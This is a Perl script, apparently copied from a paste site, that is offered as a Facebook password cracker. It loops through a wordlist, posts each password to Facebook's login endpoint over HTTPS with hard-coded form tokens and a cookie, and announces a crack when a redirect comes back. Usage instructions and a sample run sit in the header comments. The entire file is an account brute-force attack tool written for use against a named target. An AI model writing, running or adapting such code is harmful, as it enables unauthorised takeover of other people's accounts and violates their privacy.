#!/usr/bin/perl## Bruteforce-Facebook## Description:# Imad'Ox Cracker

1. #!/usr/bin/perl
2. #
3. # Bruteforce-Facebook
4. #
5. # Description:
6. # Imad'Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS.
7. #
8. # Usage:
9. # perl Imad'Ox-Bruter.pl login wordlist
10. # login could be either a user's email address or profile name
11. #
12. # Module Requirements:
13. #
14. # Install module if missing:
15. # perl -MCPAN -e 'install Net::SSLeay'
16. #
17. # Demo:
18. # perl Imad'Ox-Bruter.pl Facebooklogin@facebook.com wordlist.lst
19. #
20. # --- Imad'Ox-Bruter Facebook password cracking tool
21. # --- By Imad'Ox Hunter
22. # --- www.facebook.com/imad.elouajib
23. #
24. # [+] Cracking Facebooklogin@facebook.com ...
25. #
26. # [-] test -> Failed
27. # [-] test123 -> Failed
28. # [-] testtest -> Failed
29. # [-] testest123 -> Failed
30. # [-] qwerty -> Failed
31. # [-] azerty -> Failed
32. # [-] password -> Failed
33. # [-] password123 -> Failed
34. #
35. ########################################################
36. # [+] CRACKED! Your password is P@$$W0RD
37. ########################################################
38. #
39.  
40. use strict;
41. use Net::SSLeay::Handle;
42.  
43. if(!defined($ARGV[0] && $ARGV[1])) {
44.  
45. system('clear');
46. print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
47. print "+++ Coded by Imad'Ox-Hunter\n";
48. print "+++ www.fb.com/imad.elouajib\n\n";
49. print "+++ Usage: perl $0 login wordlist\n\n";
50. exit; }
51.  
52. my $user = $ARGV[0];
53. my $wordlist = $ARGV[1];
54.  
55. open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n";
56.  
57. print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n";
58. print "+++ Coded by Imad'Ox-Hunter\n";
59. print "+++ www.fb.com/imad.elouajib\n";
60. print "\n[+] Now Cracking $user ...\n\n";
61.  
62. while (my $password = <LIST>) {
63. chomp ($password);
64. $password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg;
65.  
66. my $a = "POST /login.php HTTP/1.1";
67. my $b = "Host: www.facebook.com";
68. my $c = "Connection: close";
69. my $e = "Cache-Control: max-age=0";
70. my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
71. my $g = "Origin: https://www.facebook.com";
72. my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31";
73. my $i = "Content-Type: application/x-www-form-urlencoded";
74. my $j = "Accept-Encoding: gzip,deflate,sdch";
75. my $k = "Accept-Language: en-US,en;q=0.8";
76. my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3";
77.  
78. my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa";
79. my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In";
80. my $cl = length($post);
81. my $d = "Content-Length: $cl";
82.  
83.  
84. my ($host, $port) = ("www.facebook.com", 443);
85.  
86. tie(*SSL, "Net::SSLeay::Handle", $host, $port);
87.  
88.  
89. print SSL "$a\n";
90. print SSL "$b\n";
91. print SSL "$c\n";
92. print SSL "$d\n";
93. print SSL "$e\n";
94. print SSL "$f\n";
95. print SSL "$g\n";
96. print SSL "$h\n";
97. print SSL "$i\n";
98. print SSL "$j\n";
99. print SSL "$k\n";
100. print SSL "$l\n";
101. print SSL "$cookie\n\n";
102.  
103. print SSL "$post\n";
104.  
105. my $success;
106. while(my $result = <SSL>){
107. if($result =~ /Location(.*?)/){
108. $success = $1;
109. }
110. }
111. if (!defined $success)
112. {
113. print "[-] $password -> Not Him :( \n";
114. close SSL;
115. }
116. else
117. {
118. print "\n########################################################\n";
119. print "[+] Yuuup!! Pass Cracked => Pass is $password :D\n";
120. print "########################################################\n\n";
121. close SSL;
122. exit;
123. }
124. }